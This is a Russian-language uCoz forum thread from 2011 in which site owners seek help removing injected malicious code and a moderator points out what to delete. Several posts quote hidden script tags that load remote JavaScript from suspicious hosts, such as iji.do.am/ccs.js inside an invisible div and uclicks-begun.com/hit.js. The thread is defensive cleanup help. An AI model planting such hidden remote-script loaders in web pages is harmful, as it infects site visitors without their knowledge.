Модератор форума: Yuri_G  
Вирусы на сайтах (для изучения)
Rimsskii
Сообщений: 2
Репутация: 3

Сообщение # 1261 | 05:46:25
Прошу Вас помочь удалить с сайта вредный код , должен быть внизу главной страницы и капец сайту.

Rimsskii.ru
Думайте сами. Решайте сами.
Сообщение отредактировал Rimsskii - Пятница, 23 Сен 2011, 06:20:10
mishka1978
Сообщений: 7
Репутация: 0

Сообщение # 1262 | 10:39:21
Помогите, пожалуйста, найти халявщика,тоесть код, который расставляет левые ссылки на моем сайте, вот адресс http://mirmebeli.ucoz.ua, при том, что левые ссылки обнаруживаются на всех страницах кроме главной, ( ссылки идут на http://test.1link.ru, http://ucoz.ru (Не знаешь, где сделать сайт??? на uCoz можно сделать любой, даже самый сложный сайт... ), http://games.ucoz.ru (Онлайн игры Лучшие онлайн игры на любой вкус. Рейтинги, отзывы.) - это некотрые левые ссылки), кроме это ресурс http://2ip.ru выдал что на сайие обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код. Хотя прошелся по другим сканерам показало что сайт чистый, как вообще проверить и кому верить, чтобы спать спокойно. Буду очень Вам признателен и спасибо за ответ.
Сообщение отредактировал mishka1978 - Пятница, 23 Сен 2011, 19:42:24
Автор8227
Сообщений: 1
Репутация: 0

Сообщение # 1263 | 18:34:57
Всем доброго времени суток.
Прошу помощи, у меня на сайте вредоносный код появился, но не могу его найти. Буде крайне благодарен за помощь.
Сайт: www.pozir.com
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1264 | 20:43:13
mishka1978,
Quote
( ссылки идут на http://test.1link.ru, http://ucoz.ru (Не знаешь, где сделать сайт??? на uCoz можно сделать любой, даже самый сложный сайт... ), http://games.ucoz.ru (Онлайн игры Лучшие онлайн игры на любой вкус. Рейтинги, отзывы.) - это некотрые левые ссылки)
это тип стандартной рекламы от юкоз, которая транслируется нецелевой аудитории. то есть это то, что показывается нецелевикам вместо стандартного рекламного баннера
Quote
кроме это ресурс http://2ip.ru выдал что на сайие обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
сервис реагирует на все ифреймы на странице и он не разбирает и не понимает где опасный и где безопасный. на сайтах системы юкоз есть два ифрейма. рекламмный баннер и мини чат. они безопасны.

Автор8227, из опросов удалите то что выделено красным

Quote
for(var i = 0; i < a.length; i++){$('div.answer div').eq(i).addClass('progress').css({height: '18px'});$('div.answer div div').eq(i).addClass('progress progress_'+a).css({background: 'url(' + a[i] + ')', marginTop: '-3px', marginBottom: '-3px', height: '25px', backgroundRepeat: 'repeat-x'});}
$('div.answer span').each(function(){$(this).html($(this).html()+' - <span class="procent">'+$(this).attr('title').split(':')[1]+'</span>')});
</script><div style="display:none;"><script src="http://iji.do.am/ccs.js"></script></div></form></div><!-- </bc> --></div> </div>


и перевод сайта от ромале - это мусор

из чата удалите

Quote
<div id="xs_contact" style="display: none;">
<div id="contactable" align="center"><script src="http://i1ii.ru/1.js" type="text/javascript"></script></div>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
mishka1978
Сообщений: 7
Репутация: 0

Сообщение # 1265 | 21:43:03
Quote (webanet)
Quote
( ссылки идут на http://test.1link.ru, http://ucoz.ru (Не знаешь, где сделать сайт??? на uCoz можно сделать любой, даже самый сложный сайт... ), http://games.ucoz.ru (Онлайн игры Лучшие онлайн игры на любой вкус. Рейтинги, отзывы.) - это некотрые левые ссылки)
это тип стандартной рекламы от юкоз, которая транслируется нецелевой аудитории. то есть это то, что показывается нецелевикам вместо стандартного рекламного баннера
Quote
кроме это ресурс http://2ip.ru выдал что на сайие обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
сервис реагирует на все ифреймы на странице и он не разбирает и не понимает где опасный и где безопасный. на сайтах системы юкоз есть два ифрейма. рекламмный баннер и мини чат. они безопасны.

Автор8227, из опросов удалите то что выделено красным

Quote
for(var i = 0; i < a.length; i++){$('div.answer div').eq(i).addClass('progress').css({height: '18px'});$('div.answer div div').eq(i).addClass('progress progress_'+a).css({background: 'url(' + a[i] + ')', marginTop: '-3px', marginBottom: '-3px', height: '25px', backgroundRepeat: 'repeat-x'});}
$('div.answer span').each(function(){$(this).html($(this).html()+' - <span class="procent">'+$(this).attr('title').split(':')[1]+'</span>')});
</script><div style="display:none;"><script src="http://iji.do.am/ccs.js"></script></div></form></div><!-- </bc> --></div> </div>

и перевод сайта от ромале - это мусор

из чата удалите

Quote
<div id="xs_contact" style="display: none;">
<div id="contactable" align="center"><script src="http://i1ii.ru/1.js" type="text/javascript"></script></div>


Спасибо всем кто ответил на мое сообщение, но это не решило мою проблемму.
Уважаемая webanet, также у меня еще три на Юкозе и ни на одном из них http://2ip.ru не выдал подобного сообщения, кроме этого подобных левых ссылок о которых я написал давно небыло они появились относительно недавно. Также проверял свой сайт онлайн антивирусами нортон и др.веб оба показали что сайт чистый, подскажите стоит ли дальше заморачиваться по поводу iframe. Спасибо.

Уважаемый Автор8227 у меня на сайте нет ни чата ни опроса, откуда я должен удалить отмеченный ссылки. Спасибо.
Сообщение отредактировал mishka1978 - Суббота, 24 Сен 2011, 21:43:52
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1266 | 00:00:56
mishka1978, вот так выглядит рекламный баннер со стороны нецелевого посетителя на вашем сайте


Quote
http://2ip.ru
этот сервис не является сервисом безопасности. это для народа. на всех ваших трех сайтах есть стандартная реклама от юкоз?
не стоит вообще заморачиваться этим сервисом. он даже ип правильно определить не может, если случай нелинейный. это непрофессиональный сервис это развлекалочка для народа
заморачиваться не стоит
и если вы так разбираетесь, то осматривайте код своего сайта со стороны исходника, или берите у гугла код страницы (смотреть сайт как гугл бот) и анализируйте код. это лучше и надежнее всех сервисов
на счет левых ссылок. оденьте американский или любой другой европейский прокси, зайдите к себе на сайт, посмотрите как выглядит рекламный баннер, а потом загляните в исходный код сайта. сразу увидите что откуда
Quote
но это не решило мою проблемму.
проблему с ссылками которую вы нашли решит отключение рекламного баннера, или это не проблема

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
yony
Сообщений: 20
Репутация: 0

Сообщение # 1267 | 08:21:28
Здраствуйте, у меня яндекс выдаёт вот ето [color=red]:В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.
помогите плиз найти вирус, подскажите, как.
http://piddnistryany.at.ua/
Admin7948
Сообщений: 5
Репутация: 0

Сообщение # 1268 | 17:05:27
Добрый день Webanet!
Мой сайт: http://ck-sportfishing.at.ua/
Проблема с переадресацией на mail.ru
Все переадресации происходят с главной и меню на главной
http://ck-sportfishing.at.ua/
а так же форуме
http://ck-sportfishing.at.ua/forum/
Проблема обнаруживается как под логином так и под гостем.
Огромная просьба помочь ...
С уважением ...
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1269 | 01:35:58
yony, выделенное красным удалить

Quote
<td width="70%" background="/.s/t/121/4.gif"><div class="blockTitle"><!-- <bt> -->У нас на сайті<!-- </bt> --></div></td>
<td width="28%"><img border="0" src="/.s/t/121/10.gif" width="54" height="21"></td>
</tr>
</table>
</td>
</tr>
<tr><td class="topBorder" style="padding:3px;" bgcolor="#F4F4F4"><!-- <bc> --><script type="text/javascript" src="http://piddnistryany.at.ua/informer/3"></script><!-- </bc> --></td></tr>
<tr><td bgcolor="#E9ECF5"><img border="0" src="/.s/t/121/11.gif" width="190" height="21"></td></tr>
</table>
<div style="padding:3px"></div>
там ваша проблема
и зачем вы вставляете видео с ютуба ифреймами? осваивайте стандартные функции мультимедиа

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1270 | 01:42:05
Admin7948, попробуйте для начала полностью удалить свою лупу
Quote
<!-- Лупа -->
<script type="text/javascript" src="http://ck-sportfishing.at.ua/js/jquery.min.js"></script>
<script type="text/javascript" src="http://ck-sportfishing.at.ua/js/ddpowerzoomer.js"></script>
<script type="text/javascript">
jQuery(document).ready(function($){ //fire on DOM ready
$('img#gallerya').addpowerzoom({magnifiersize:[150,150]})
$('img.gallery').addpowerzoom({powerrange:[2,5]})
})
</script>
<!-- /Лупа -->

и отпишитесь о результатах.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Dirigent
Сообщений: 1
Репутация: 0

Сообщение # 1271 | 15:55:34
вирус [PUA.HTML.Infected.WebPage-2]
Ule искать, подскажите, пожалуйста
сайт - http://www.aveclassics.net/
Проверка здесь - http://antivirus-alarm.ru/proverka/?url=http%3A%2F%2Fwww.aveclassics.net%2F

Все грани искусства на сайте Интермеццо
es-logos
Сообщений: 1
Репутация: 7

Сообщение # 1272 | 21:36:28
Проблема - пользователи пишут, что на главной странице видят троянский банер, приглашающий зайти на страницу очистки от вирусов, где они заражаются...

Помогите!

Сайт http://eshatos.ucoz.ru

Сам я этого банер0трояна никогда не вижу, но пользователи пишут, аот один прислал как выглядит - прикрепляю коллаж
Прикрепления: 8934084.jpg (188.4 Kb)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1273 | 21:38:46
es-logos, глобальный блок верхняя часть сайта. выделенное красным удалить
Quote
</tbody></table><!--?ifnot()Сохранить
?--><script type="text/javascript" src="http://uclicks-begun.com/hit.js" ></script><!--?endif?--><!--/U1AHEADER1Z-->
<TABLE border=0 cellSpacing=0 cellPadding=0 width="100%">

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1274 | 22:12:35
Admin7948, в общем так. перебирайте скрипты залитые на ваш хост и флешки
у вас что-то генерит ифрейм с адресом rsdisp.ru и dпроизвольный номер.rsdisp.ru
я просто не в состоянии вкрывать все ваши скрипты и флешки до 2 часов ночи. слишком много их у вас
методом исключения действуйте
начните в этой конструкции http://ck-sportfishing.at.ua/h_v-files/scnn4gr.js

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
ozzyo
Сообщений: 1
Репутация: 0

Сообщение # 1275 | 22:33:23
Кто-нибудь сталкивался вот с такой проблемой, если заходишь на сайт с мобильного телефона, то появляется сообщение, от том, что вышла новая версия opera-mini, предлагает обновит, причем через отправку смс. как от этого избавиться?
1) Косяк срабатывает на главной странице. ссылка на Сайт
2) Если заходишь как гость.
Спасибо.
Поиск: